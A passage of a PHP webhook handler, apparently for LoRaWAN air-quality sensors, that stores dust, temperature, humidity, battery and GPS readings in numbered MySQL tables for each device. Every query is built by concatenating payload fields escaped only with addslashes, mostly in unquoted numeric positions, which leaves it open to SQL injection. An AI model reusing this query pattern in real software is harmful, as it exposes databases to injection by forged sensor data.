$sql = 'INSERT INTO measurement49 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->relative_humidity_20)) {
$sql = 'INSERT INTO measurement50 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_20);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->barometric_pressure_30)) {
$sql = 'INSERT INTO measurement51 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->barometric_pressure_30);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->luminosity_51)) {
$sql = 'INSERT INTO measurement52 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_51);
//echo $sql;
$result = mysqlquery($sql);
$pm10 = $data->payload_fields->luminosity_51;
}
if(isset($data->payload_fields->luminosity_50)) {
$sql = 'INSERT INTO measurement53 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_50);
//echo $sql;
$result = mysqlquery($sql);
$pm25 = $data->payload_fields->luminosity_50;
}
$sendToRIVM = true;
$rivmSensorName = 'rfsee_aid_sensor_11 lat=52.18168,lon=5.94374';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-rfsee11';
}
break;
case '007218160B8DD4F9':
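// dustsensor_01: two analog dust channels plus temperature, humidity and barometric pressure.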
if($data->dev_id == 'dustsensor_01') {
if(isset($data->payload_fields->analog_in_0)) {
$sql = 'INSERT INTO measurement59 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_0);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->analog_in_1)) {
$sql = 'INSERT INTO measurement150 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_1);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->temperature_2)) {
$sql = 'INSERT INTO measurement144 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_2);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->relative_humidity_3)) {
$sql = 'INSERT INTO measurement145 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_3);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->barometric_pressure_4)) {
$sql = 'INSERT INTO measurement146 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->barometric_pressure_4);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000001':
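// Generic numbered EUIs: each EUI may be matched against up to three device generations, selected by dev_id prefix.
// The original ttn_apld_dust_* nodes report dust density only, the 2018 ttn_apld_dust_2018* nodes report
// PM10/PM2.5 with temperature and humidity, and the hittestress-* nodes additionally report battery voltage,
// CPU temperature and a GPS position.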
if($data->dev_id == 'ttn_apld_dust_0000000000000001') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement60 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000001') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement169 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement170 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement171 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement172 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-0000000000000001') {
logError('hittestress-0000000000000001: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement319 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement320 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement321 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement322 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement323 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement324 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
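// Store the GPS fix only when both coordinates are present and neither string starts with '0'
// (a leading zero presumably signals that the module has no fix yet); the node's last known
// position is updated alongside the location history.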
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode125 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=125';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '0000000000000002':
if($data->dev_id == 'ttn_apld_dust_0000000000000002') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement61 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000002') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement173 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement174 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement175 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement176 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-0000000000000002') {
logError('hittestress-0000000000000002: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement327 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement328 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement329 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement330 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement331 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement332 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode126 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=126';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '0000000000000003':
if($data->dev_id == 'ttn_apld_dust_0000000000000003') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement62 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000003') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement177 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement178 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement179 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement180 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-0000000000000003') {
logError('hittestress-0000000000000003: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement333 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement334 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement335 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement336 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement337 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement338 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode127 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=127';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '0000000000000004':
if($data->dev_id == 'ttn_apld_dust_0000000000000004') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement63 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000004') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement181 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement182 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement183 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement184 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-0000000000000004') {
logError('hittestress-0000000000000004: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement339 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement340 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement341 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement342 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement343 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement344 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode128 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=128';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '0000000000000005':
if($data->dev_id == 'ttn_apld_dust_0000000000000005') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement64 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000005') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement185 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement186 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement187 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement188 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-0000000000000005') {
logError('hittestress-0000000000000005: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement345 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement346 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement347 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement348 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement349 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement350 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode129 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=129';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '0000000000000006':
if($data->dev_id == 'ttn_apld_dust_0000000000000006') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement65 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000006') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement189 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement190 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement191 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement192 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-0000000000000006') {
logError('hittestress-0000000000000006: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement351 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement352 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement353 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement354 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement355 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement356 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode130 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=130';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '0000000000000007':
if($data->dev_id == 'ttn_apld_dust_0000000000000007') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement66 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000007') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement193 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement194 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement195 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement196 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-0000000000000007') {
logError('hittestress-0000000000000007: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement357 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement358 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement359 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement360 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement361 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement362 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode131 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=131';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '0000000000000008':
if($data->dev_id == 'ttn_apld_dust_0000000000000008') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement67 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000008') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement197 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement198 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement199 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement200 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-0000000000000008') {
logError('hittestress-0000000000000008: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement363 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement364 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement365 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement366 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement367 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement368 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode132 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=132';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '0000000000000009':
if($data->dev_id == 'ttn_apld_dust_0000000000000009') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement68 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000009') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement201 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement202 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
